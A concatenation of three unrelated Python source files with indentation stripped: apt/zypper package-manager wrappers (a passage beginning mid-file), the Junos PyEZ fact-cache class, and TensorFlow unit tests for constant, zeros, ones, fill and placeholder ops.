cmd.extend(extra_flags)
cmd.extend(packages)
return self._run(cmd)
def clean(self):
cmd = self.executable + ['update']
return self._run(cmd)
def add_repo_gpg_key(self, url):
gpg_path = url.split('file://')[-1]
if not url.startswith('file://'):
cmd = ['wget', '-O', 'release.asc', url ]
self._run(cmd, stop_on_nonzero=False)
gpg_file = 'release.asc' if not url.startswith('file://') else gpg_path
cmd = ['apt-key', 'add', gpg_file]
self._run(cmd)
def add_repo(self, name, url, **kw):
gpg_url = kw.pop('gpg_url', None)
if gpg_url:
self.add_repo_gpg_key(gpg_url)
safe_filename = '%s.list' % name.replace(' ', '-')
mode = 0644
if urlparse(url).password:
mode = 0600
self.remote_conn.logger.info(
"Creating repo file with mode 0600 due to presence of password"
)
self.remote_conn.remote_module.write_sources_list(
url,
self.remote_info.codename,
safe_filename,
mode
)
# Add package pinning for this repo
fqdn = urlparse(url).hostname
self.remote_conn.remote_module.set_apt_priority(fqdn)
def remove_repo(self, name):
safe_filename = '%s.list' % name.replace(' ', '-')
filename = os.path.join(
'/etc/apt/sources.list.d',
safe_filename
)
self.remote_conn.remote_module.unlink(filename)
class Zypper(PackageManager):
"""
Zypper package management
"""
executable = [
'zypper',
'--non-interactive',
'--quiet'
]
name = 'zypper'
def install(self, packages, **kw):
if isinstance(packages, str):
packages = [packages]
extra_flags = kw.pop('extra_install_flags', None)
cmd = self.executable + ['install']
if extra_flags:
if isinstance(extra_flags, str):
extra_flags = [extra_flags]
cmd.extend(extra_flags)
cmd.extend(packages)
return self._run(cmd)
def remove(self, packages, **kw):
if isinstance(packages, str):
packages = [packages]
extra_flags = kw.pop('extra_remove_flags', None)
cmd = self.executable + ['remove']
if extra_flags:
if isinstance(extra_flags, str):
extra_flags = [extra_flags]
cmd.extend(extra_flags)
cmd.extend(packages)
return self._run(cmd)
def clean(self):
cmd = self.executable + ['refresh']
return self._run(cmd)
|
|
import collections
import warnings
from pprint import pformat
import jnpr.junos.facts
from jnpr.junos.facts import __doc__ as facts_doc
import jnpr.junos.exception
class _FactCache(collections.MutableMapping):
"""
A dictionary-like object which performs on-demand fact gathering.
This class should not be used directly. An instance of this class is
available as the :attr:`facts` attribute of a Device object.
**Dictionary magic methods:**
* :meth:`__getitem__`: Gets the value of a given key in the dict.
* :meth:`__delitem__`: Called when a key is deleted from the dict.
* :meth:`__setitem__`: Called when a key is set on the dict.
* :meth:`__iter__`: Called when iterating over the keys of the dict.
* :meth:`__len__`: Called when getting the length of the dict.
* :meth:`__repr__`: Called when representing the dict as a string.
**Additional methods:**
* :meth:`_refresh`: Refreshes the fact cache.
"""
def __init__(self, device):
"""
_FactCache object constructor.
:param device: The device object for which fact gathering will be
performed.
"""
self._device = device
self._cache = dict()
self._call_stack = list()
self._callbacks = jnpr.junos.facts._callbacks
self._exception_on_failure = False
self._warnings_on_failure = False
self._should_warn = False
def __getitem__(self, key):
"""
Return the value of a particular key in the dictionary.
If the fact has already been cached, the value is simply returned from
the cache. If the value has not been cached, then the appropriate
callback function is invoked to gather the fact from the device. The
value is cached, and then returned.
If _warnings_on_failure is True, then a warning is logged if there is
an error gathering a fact from the device.
:param key: The key who's value is returned.
:returns value: The value of the key fact. If key is a known fact, but
there is an error gathering the fact, then the value None is
returned.
:raises KeyError:
When key is not a known fact (there is no callback present to
gather the fact.)
:raises jnpr.junos.exception.FactLoopError:
When there is a loop attempting to gather the fact.
:raises other exceptions as defined by the fact gathering modules:
When an error is encountered and _exception_on_failure is True.
"""
if key not in self._callbacks:
# Not a fact that we know how to provide.
raise KeyError('%s: There is no function to gather the %s fact' %
(key, key))
if key not in self._cache:
# A known fact, but not yet cached. Go get it and cache it.
if self._callbacks[key] in self._call_stack:
raise jnpr.junos.exception.FactLoopError(
"A loop was detected while gathering the %s fact. The %s "
"module has already been called. Please report this error."
% (key, self._callbacks[key].__module__))
else:
# Add the callback we are about to invoke to the _call_stack in
# order to detect loops in fact gathering.
self._call_stack.append(self._callbacks[key])
try:
# Invoke the callback
new_facts = self._callbacks[key](self._device)
except jnpr.junos.exception.FactLoopError:
raise
except Exception as err:
# An exception was raised. No facts were returned.
# Raise the exception to the user?
if self._exception_on_failure:
raise
# Warn the user?
if self._warnings_on_failure:
self._should_warn = True
# Set all of the facts which should have been returned
# by this callback to the default value of None.
for new_key in self._callbacks:
if self._callbacks[key] is self._callbacks[new_key]:
self._cache[new_key] = None
else:
# No exception
for new_key in new_facts:
if (new_key not in self._callbacks or
self._callbacks[key] is not self._callbacks[new_key]):
# The callback returned a fact it didn't advertise
raise RuntimeError("The %s module returned the %s "
"fact, but does not list %s as a "
"provided fact. Please report this "
"error." %
(self._callbacks[key].__module__,
new_key,
new_key))
else:
# Cache the returned fact
self._cache[new_key] = new_facts[new_key]
finally:
# Always pop the current callback from _call_stack,
# regardless of whether or not an exception was raised.
self._call_stack.pop()
if key in self._cache:
# key fact is cached. Return it.
if self._device._fact_style == 'both':
# Compare old and new-style values.
if key in self._device._ofacts:
# Skip key comparisons for certain keys.
#
# The old facts gathering code has an up_time key.
# The new facts gathering code maintains this key for RE0
# and RE1 facts, but it's not comparable (because it
# depends on when the fact was gathered and is therefore
# not really a "fact".) The new re_info fact omits the
# up_time field for this reason.
#
# The old facts gathering code didn't return a correct
# value for the master fact when the system was a VC.
# The new fact gathering code still returns the master fact
# but returns a correct value for VCs. It also returns a
# new re_master fact which is much more useful.
if key not in ['RE0', 'RE1', 'master']:
if self._cache[key] != self._device._ofacts[key]:
warnings.warn('New and old-style facts do not '
'match for the %s fact.\n'
' New-style value: %s\n'
' Old-style value: %s\n' %
(key,
self._cache[key],
self._device._ofacts[key]),
RuntimeWarning)
return self._cache[key]
else:
# key fact was not returned by callback
raise RuntimeError("The %s module claims to provide the %s "
"fact, but failed to return it. Please report "
"this error." %
(self._callbacks[key].__module__, key))
def __delitem__(self, key):
"""
Facts are read-only. Don't allow deleting an item.
"""
raise RuntimeError("facts are read-only!")
def __setitem__(self, key, value):
"""
Facts are read-only. Don't allow setting an item.
"""
raise RuntimeError("facts are read-only!")
def __iter__(self):
"""
An iterator of known facts.
:returns iterator: of all of the 'non-hidden' facts we know how to
gather, regardless of whether or not they've already been cached. Fact
names which are hidden start with an underscore and are not returned.
"""
callbacks = {}
for key in self._callbacks:
if not key.startswith('_'):
callbacks[key] = self._callbacks[key]
return iter(callbacks)
def __len__(self):
"""
The length of all known facts.
:returns length: of all of the facts we know how to gather,
regardless of whether or not they've already been cached.
"""
return len(self._callbacks)
def __str__(self):
"""
A string representation of the facts dictionary.
:returns string: a string representation of the dictionary.
Because this returns the value of every fact, it has the
side-effect of causing any ungathered facts to be gathered and then
cached.
"""
string = ''
for key in sorted(self):
if not key.startswith('_'):
current = "'%s': %s" % (key, repr(self.get(key)))
if string:
string = ', '.join([string, current])
else:
string = current
return '{' + string + '}'
def __repr__(self):
"""
A formated string representation of the facts dictionary.
:returns string: a formated string representation of the dictionary.
Because this returns the value of every fact, it has the
side-effect of causing any ungathered facts to be gathered and then
cached.
"""
return pformat(dict(self))
def _refresh(self,
exception_on_failure=False,
warnings_on_failure=False,
keys=None):
"""
Empty the cache to force a refresh of one or more facts.
Empties the fact gathering cache for all keys (if keys == None) or a
set of keys. This causes the fact to be gathered and cached upon next
access. If either eception_on_failure or warnings_on_failure is true,
then all facts are accessed by getting the string representation of the
facts. This causes all facts to immediately be populated so that any
exceptions or warnings are generated during the call to _refresh().
:param exception_on_failure: A boolean which indicates if an exception
should be raised upon a failure gathering facts.
:param warnings_on_failure: A boolean which indicates if an warning
should be logged upon a failure gathering facts.
:param keys: A single key as a string, or an iterable of keys (such
as a list, set, or or tuple.) The specified keys are emptied from
the cache. If None, all keys are emptied from the cache.
:raises RuntimeError:
When keys contains an unknown fact.
"""
refresh_keys = None
if keys is not None:
if isinstance('str', type(keys)):
refresh_keys = (keys,)
else:
refresh_keys = keys
if refresh_keys is not None:
for key in refresh_keys:
if key in self._callbacks:
if key in self._cache:
del self._cache[key]
else:
raise RuntimeError('The %s fact can not be refreshed. %s '
'is not a known fact.' % (key, key))
else:
self._cache = dict()
if exception_on_failure or warnings_on_failure:
self._exception_on_failure = exception_on_failure
self._warnings_on_failure = warnings_on_failure
try:
_ = str(self._device.facts)
except Exception:
if exception_on_failure:
raise
finally:
if warnings_on_failure and self._should_warn:
warnings.warn('Facts gathering is incomplete. '
'To know the reason call '
'"dev.facts_refresh('
'exception_on_failure=True)"',
RuntimeWarning)
self._exception_on_failure = False
self._warnings_on_failure = False
self._should_warn = False
# Precede the class's documentation with the documentation on the specific
# facts from the jnpr.junos.facts package.
__doc__ = (facts_doc + "Implementation details on the _FactCache class:" +
__doc__)
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for ConstantOp."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class ConstantTest(test.TestCase):
def _testCpu(self, x):
np_ans = np.array(x)
with self.test_session(use_gpu=False):
tf_ans = ops.convert_to_tensor(x).eval()
if np_ans.dtype in [np.float32, np.float64, np.complex64, np.complex128]:
self.assertAllClose(np_ans, tf_ans)
else:
self.assertAllEqual(np_ans, tf_ans)
def _testGpu(self, x):
np_ans = np.array(x)
with self.test_session(use_gpu=True):
tf_ans = ops.convert_to_tensor(x).eval()
if np_ans.dtype in [np.float32, np.float64, np.complex64, np.complex128]:
self.assertAllClose(np_ans, tf_ans)
else:
self.assertAllEqual(np_ans, tf_ans)
def _testAll(self, x):
self._testCpu(x)
self._testGpu(x)
def testFloat(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32))
self._testAll(
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.float32))
self._testAll(np.empty((2, 0, 5)).astype(np.float32))
def testDouble(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float64))
self._testAll(
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.float64))
self._testAll(np.empty((2, 0, 5)).astype(np.float64))
def testInt32(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.int32))
self._testAll((100 * np.random.normal(size=30)).reshape([2, 3, 5]).astype(
np.int32))
self._testAll(np.empty((2, 0, 5)).astype(np.int32))
def testInt64(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.int64))
self._testAll((100 * np.random.normal(size=30)).reshape([2, 3, 5]).astype(
np.int64))
self._testAll(np.empty((2, 0, 5)).astype(np.int64))
def testComplex64(self):
self._testAll(
np.complex(1, 2) *
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.complex64))
self._testAll(
np.complex(1, 2) *
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.complex64))
self._testAll(np.empty((2, 0, 5)).astype(np.complex64))
def testComplex128(self):
self._testAll(
np.complex(1, 2) *
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.complex128))
self._testAll(
np.complex(1, 2) *
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.complex128))
self._testAll(np.empty((2, 0, 5)).astype(np.complex128))
def testString(self):
self._testCpu(
np.array([compat.as_bytes(str(x)) for x in np.arange(-15, 15)]).reshape(
[2, 3, 5]))
self._testCpu(np.empty((2, 0, 5)).astype(np.str_))
def testStringWithNulls(self):
with self.test_session():
val = ops.convert_to_tensor(b"\0\0\0\0").eval()
self.assertEqual(len(val), 4)
self.assertEqual(val, b"\0\0\0\0")
with self.test_session():
val = ops.convert_to_tensor(b"xx\0xx").eval()
self.assertEqual(len(val), 5)
self.assertAllEqual(val, b"xx\0xx")
nested = [[b"\0\0\0\0", b"xx\0xx"], [b"\0_\0_\0_\0", b"\0"]]
with self.test_session():
val = ops.convert_to_tensor(nested).eval()
# NOTE(mrry): Do not use assertAllEqual, because it converts nested to a
# numpy array, which loses the null terminators.
self.assertEqual(val.tolist(), nested)
def testExplicitShapeNumPy(self):
with ops.Graph().as_default():
c = constant_op.constant(
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32),
shape=[2, 3, 5])
self.assertEqual(c.get_shape(), [2, 3, 5])
def testImplicitShapeNumPy(self):
with ops.Graph().as_default():
c = constant_op.constant(
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32))
self.assertEqual(c.get_shape(), [2, 3, 5])
def testExplicitShapeList(self):
with ops.Graph().as_default():
c = constant_op.constant([1, 2, 3, 4, 5, 6, 7], shape=[7])
self.assertEqual(c.get_shape(), [7])
def testImplicitShapeList(self):
with ops.Graph().as_default():
c = constant_op.constant([1, 2, 3, 4, 5, 6, 7])
self.assertEqual(c.get_shape(), [7])
def testExplicitShapeNumber(self):
with ops.Graph().as_default():
c = constant_op.constant(1, shape=[1])
self.assertEqual(c.get_shape(), [1])
def testImplicitShapeNumber(self):
with ops.Graph().as_default():
c = constant_op.constant(1)
self.assertEqual(c.get_shape(), [])
def testShapeInconsistent(self):
with ops.Graph().as_default():
c = constant_op.constant([1, 2, 3, 4, 5, 6, 7], shape=[10])
self.assertEqual(c.get_shape(), [10])
# pylint: disable=g-long-lambda
def testShapeWrong(self):
with ops.Graph().as_default():
with self.assertRaisesWithPredicateMatch(
ValueError,
lambda e: ("Too many elements provided. Needed at most 5, "
"but received 7" == str(e))):
constant_op.constant([1, 2, 3, 4, 5, 6, 7], shape=[5])
# pylint: enable=g-long-lambda
def testTooLargeConstant(self):
with ops.Graph().as_default():
large_array = np.zeros((512, 1024, 1024), dtype=np.float32)
with self.assertRaisesRegexp(
ValueError,
"Cannot create a tensor proto whose content is larger than 2GB."):
c = constant_op.constant(large_array)
def testTooLargeGraph(self):
with ops.Graph().as_default() as g:
large_array = np.zeros((256, 1024, 1024), dtype=np.float32)
c = constant_op.constant(large_array)
d = constant_op.constant(large_array)
with self.assertRaisesRegexp(ValueError,
"GraphDef cannot be larger than 2GB."):
g.as_graph_def()
def testSparseValuesRaiseErrors(self):
with self.assertRaisesRegexp(ValueError,
"setting an array element with a sequence"):
c = constant_op.constant([[1, 2], [3]], dtype=dtypes_lib.int32)
with self.assertRaisesRegexp(ValueError, "must be a dense"):
c = constant_op.constant([[1, 2], [3]])
with self.assertRaisesRegexp(ValueError, "must be a dense"):
c = constant_op.constant([[1, 2], [3], [4, 5]])
class AsTensorTest(test.TestCase):
def testAsTensorForTensorInput(self):
with ops.Graph().as_default():
t = constant_op.constant(10.0)
x = ops.convert_to_tensor(t)
self.assertIs(t, x)
def testAsTensorForNonTensorInput(self):
with ops.Graph().as_default():
x = ops.convert_to_tensor(10.0)
self.assertTrue(isinstance(x, ops.Tensor))
def testAsTensorForShapeInput(self):
with self.test_session():
x = ops.convert_to_tensor(tensor_shape.TensorShape([]))
self.assertEqual(dtypes_lib.int32, x.dtype)
self.assertAllEqual([], x.eval())
x = ops.convert_to_tensor(tensor_shape.TensorShape([1, 2, 3]))
self.assertEqual(dtypes_lib.int32, x.dtype)
self.assertAllEqual([1, 2, 3], x.eval())
x = ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3]), dtype=dtypes_lib.int64)
self.assertEqual(dtypes_lib.int64, x.dtype)
self.assertAllEqual([1, 2, 3], x.eval())
x = array_ops.reshape(
array_ops.zeros([6]), tensor_shape.TensorShape([2, 3]))
self.assertAllEqual([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]], x.eval())
with self.assertRaisesRegexp(ValueError, "partially known"):
ops.convert_to_tensor(tensor_shape.TensorShape(None))
with self.assertRaisesRegexp(ValueError, "partially known"):
ops.convert_to_tensor(tensor_shape.TensorShape([1, None, 64]))
with self.assertRaises(TypeError):
ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3]), dtype=dtypes_lib.float32)
def testAsTensorForDimensionInput(self):
with self.test_session():
x = ops.convert_to_tensor(tensor_shape.TensorShape([1, 2, 3])[1])
self.assertEqual(dtypes_lib.int32, x.dtype)
self.assertAllEqual(2, x.eval())
x = ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3])[1], dtype=dtypes_lib.int64)
self.assertEqual(dtypes_lib.int64, x.dtype)
self.assertAllEqual(2, x.eval())
with self.assertRaisesRegexp(ValueError, "unknown Dimension"):
ops.convert_to_tensor(tensor_shape.TensorShape(None)[1])
with self.assertRaisesRegexp(ValueError, "unknown Dimension"):
ops.convert_to_tensor(tensor_shape.TensorShape([1, None, 64])[1])
with self.assertRaises(TypeError):
ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3])[1], dtype=dtypes_lib.float32)
class IdentityOpTest(test.TestCase):
def testIdTensor(self):
with ops.Graph().as_default():
x = constant_op.constant(2.0, shape=[6], name="input")
id_op = array_ops.identity(x, name="id")
self.assertTrue(isinstance(id_op.op.inputs[0], ops.Tensor))
self.assertProtoEquals("name: 'id' op: 'Identity' input: 'input' "
"attr { key: 'T' value { type: DT_FLOAT } }",
id_op.op.node_def)
class ZerosTest(test.TestCase):
def _Zeros(self, shape):
with self.test_session():
ret = array_ops.zeros(shape)
self.assertEqual(shape, ret.get_shape())
return ret.eval()
def testConst(self):
self.assertTrue(
np.array_equal(self._Zeros([2, 3]), np.array([[0] * 3] * 2)))
def testScalar(self):
self.assertEqual(0, self._Zeros([]))
self.assertEqual(0, self._Zeros(()))
with self.test_session():
scalar = array_ops.zeros(constant_op.constant([], dtype=dtypes_lib.int32))
self.assertEqual(0, scalar.eval())
def testDynamicSizes(self):
np_ans = np.array([[0] * 3] * 2)
with self.test_session():
# Creates a tensor of 2 x 3.
d = array_ops.fill([2, 3], 12., name="fill")
# Constructs a tensor of zeros of the same dimensions as "d".
z = array_ops.zeros(array_ops.shape(d))
out = z.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, d)
self.assertShapeEqual(np_ans, z)
def testDtype(self):
with self.test_session():
d = array_ops.fill([2, 3], 12., name="fill")
self.assertEqual(d.get_shape(), [2, 3])
# Test default type for both constant size and dynamic size
z = array_ops.zeros([2, 3])
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
z = array_ops.zeros(array_ops.shape(d))
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
# Test explicit type control
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128, dtypes_lib.int64,
dtypes_lib.bool
]:
z = array_ops.zeros([2, 3], dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
z = array_ops.zeros(array_ops.shape(d), dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
class ZerosLikeTest(test.TestCase):
def _compareZeros(self, dtype, use_gpu):
with self.test_session(use_gpu=use_gpu):
# Creates a tensor of non-zero values with shape 2 x 3.
numpy_dtype = dtype.as_numpy_dtype
d = constant_op.constant(np.ones((2, 3), dtype=numpy_dtype), dtype=dtype)
# Constructs a tensor of zeros of the same dimensions and type as "d".
z_var = array_ops.zeros_like(d)
# Test that the type is correct
self.assertEqual(z_var.dtype, dtype)
z_value = z_var.eval()
# Test that the value is correct
self.assertTrue(np.array_equal(z_value, np.array([[0] * 3] * 2)))
self.assertEqual([2, 3], z_var.get_shape())
def testZerosLikeCPU(self):
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128, dtypes_lib.int64
]:
self._compareZeros(dtype, False)
def testZerosLikeGPU(self):
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.bool, dtypes_lib.int64
]:
self._compareZeros(dtype, True)
def testZerosLikePartialShape(self):
d = array_ops.placeholder(dtypes_lib.float32, shape=[None, 4, None])
z = array_ops.zeros_like(d)
self.assertEqual(d.get_shape().as_list(), z.get_shape().as_list())
def testZerosLikeDtype(self):
# Make sure zeros_like works even for dtypes that cannot be cast between
with self.test_session():
shape = (3, 5)
dtypes = np.float32, np.complex64
for in_type in dtypes:
x = np.arange(15).astype(in_type).reshape(*shape)
for out_type in dtypes:
y = array_ops.zeros_like(x, dtype=out_type).eval()
self.assertEqual(y.dtype, out_type)
self.assertEqual(y.shape, shape)
self.assertAllEqual(y, np.zeros(shape, dtype=out_type))
class OnesTest(test.TestCase):
def _Ones(self, shape):
with self.test_session():
ret = array_ops.ones(shape)
self.assertEqual(shape, ret.get_shape())
return ret.eval()
def testConst(self):
self.assertTrue(np.array_equal(self._Ones([2, 3]), np.array([[1] * 3] * 2)))
def testScalar(self):
self.assertEqual(1, self._Ones([]))
self.assertEqual(1, self._Ones(()))
with self.test_session():
scalar = array_ops.ones(constant_op.constant([], dtype=dtypes_lib.int32))
self.assertEqual(1, scalar.eval())
def testDynamicSizes(self):
np_ans = np.array([[1] * 3] * 2)
with self.test_session():
# Creates a tensor of 2 x 3.
d = array_ops.fill([2, 3], 12., name="fill")
# Constructs a tensor of ones of the same dimensions as "d".
z = array_ops.ones(array_ops.shape(d))
out = z.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, d)
self.assertShapeEqual(np_ans, z)
def testAutoPack(self):
with self.test_session():
h = array_ops.placeholder(dtypes_lib.int32, shape=[])
w = array_ops.placeholder(dtypes_lib.int32, shape=[])
z = array_ops.ones([h, w])
out = z.eval(feed_dict={h: 4, w: 16})
self.assertAllEqual(out, np.array([[1] * 16] * 4))
def testDtype(self):
with self.test_session():
d = array_ops.fill([2, 3], 12., name="fill")
self.assertEqual(d.get_shape(), [2, 3])
# Test default type for both constant size and dynamic size
z = array_ops.ones([2, 3])
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
z = array_ops.ones(array_ops.shape(d))
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
# Test explicit type control
for dtype in (dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128,
dtypes_lib.int64, dtypes_lib.bool):
z = array_ops.ones([2, 3], dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
z = array_ops.ones(array_ops.shape(d), dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
class OnesLikeTest(test.TestCase):
def testOnesLike(self):
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128, dtypes_lib.int64
]:
numpy_dtype = dtype.as_numpy_dtype
with self.test_session():
# Creates a tensor of non-zero values with shape 2 x 3.
d = constant_op.constant(
np.ones(
(2, 3), dtype=numpy_dtype), dtype=dtype)
# Constructs a tensor of zeros of the same dimensions and type as "d".
z_var = array_ops.ones_like(d)
# Test that the type is correct
self.assertEqual(z_var.dtype, dtype)
z_value = z_var.eval()
# Test that the value is correct
self.assertTrue(np.array_equal(z_value, np.array([[1] * 3] * 2)))
self.assertEqual([2, 3], z_var.get_shape())
def testOnesLikePartialShape(self):
d = array_ops.placeholder(dtypes_lib.float32, shape=[None, 4, None])
z = array_ops.ones_like(d)
self.assertEqual(d.get_shape().as_list(), z.get_shape().as_list())
class FillTest(test.TestCase):
def _compare(self, dims, val, np_ans, use_gpu):
with self.test_session(use_gpu=use_gpu):
tf_ans = array_ops.fill(dims, val, name="fill")
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
# Fill does not set the shape.
# self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, dims, val, np_ans):
self._compare(dims, val, np_ans, False)
self._compare(dims, val, np_ans, True)
def testFillFloat(self):
np_ans = np.array([[3.1415] * 3] * 2).astype(np.float32)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillDouble(self):
np_ans = np.array([[3.1415] * 3] * 2).astype(np.float64)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillInt32(self):
np_ans = np.array([[42] * 3] * 2).astype(np.int32)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillInt64(self):
np_ans = np.array([[-42] * 3] * 2).astype(np.int64)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillComplex64(self):
np_ans = np.array([[0.15] * 3] * 2).astype(np.complex64)
self._compare([2, 3], np_ans[0][0], np_ans, use_gpu=False)
def testFillComplex128(self):
np_ans = np.array([[0.15] * 3] * 2).astype(np.complex128)
self._compare([2, 3], np_ans[0][0], np_ans, use_gpu=False)
def testFillString(self):
np_ans = np.array([[b"yolo"] * 3] * 2)
with self.test_session(use_gpu=False):
tf_ans = array_ops.fill([2, 3], np_ans[0][0], name="fill").eval()
self.assertAllEqual(np_ans, tf_ans)
def testFillNegative(self):
with self.test_session():
for shape in (-1,), (2, -1), (-1, 2), (-2), (-3):
with self.assertRaises(ValueError):
array_ops.fill(shape, 7)
# Using a placeholder so this won't be caught in static analysis.
dims = array_ops.placeholder(dtypes_lib.int32)
fill_t = array_ops.fill(dims, 3.0)
for shape in (-1,), (2, -1), (-1, 2), (-2), (-3):
with self.assertRaises(errors_impl.InvalidArgumentError):
fill_t.eval({dims: shape})
def testShapeFunctionEdgeCases(self):
# Non-vector dimensions.
with self.assertRaises(ValueError):
array_ops.fill([[0, 1], [2, 3]], 1.0)
# Non-scalar value.
with self.assertRaises(ValueError):
array_ops.fill([3, 2], [1.0, 2.0])
# Partial dimension information.
f = array_ops.fill(array_ops.placeholder(dtypes_lib.int32, shape=(4,)), 3.0)
self.assertEqual([None, None, None, None], f.get_shape().as_list())
f = array_ops.fill(
[array_ops.placeholder(
dtypes_lib.int32, shape=()), 17], 1.0)
self.assertEqual([None, 17], f.get_shape().as_list())
def testGradient(self):
with self.test_session():
in_v = constant_op.constant(5.0)
out_shape = [3, 2]
out_filled = array_ops.fill(out_shape, in_v)
err = gradient_checker.compute_gradient_error(in_v, [], out_filled,
out_shape)
self.assertLess(err, 1e-3)
class PlaceholderTest(test.TestCase):
def testDtype(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.float32, name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float"):
p_identity.eval()
def testShape(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.float32, shape=(10, 10), name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float and "
r"shape \[10,10\]"):
p_identity.eval()
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :5]})
def testPartialShape(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.float32, shape=[None, 3], name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :2]})
def testControlDependency(self):
with self.test_session():
p = array_ops.placeholder(dtypes_lib.int32, shape=[], name="p")
with ops.control_dependencies([p]):
c = constant_op.constant(5, dtypes_lib.int32)
d = math_ops.mul(p, c)
self.assertEqual(10, d.eval(feed_dict={p: 2}))
def testBadShape(self):
with self.assertRaises(ValueError):
array_ops.placeholder(dtypes_lib.float32, shape=(-1, 10))
def testTensorStr(self):
a = array_ops.placeholder(dtypes_lib.float32, name="a")
self.assertEqual("<tf.Tensor 'a:0' shape=<unknown> dtype=float32>", repr(a))
b = array_ops.placeholder(dtypes_lib.int32, shape=(32, 40), name="b")
self.assertEqual("<tf.Tensor 'b:0' shape=(32, 40) dtype=int32>", repr(b))
c = array_ops.placeholder(dtypes_lib.qint32, shape=(32, None, 2), name="c")
self.assertEqual("<tf.Tensor 'c:0' shape=(32, ?, 2) dtype=qint32>", repr(c))
class PlaceholderV2Test(test.TestCase):
def testDtype(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=None, name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
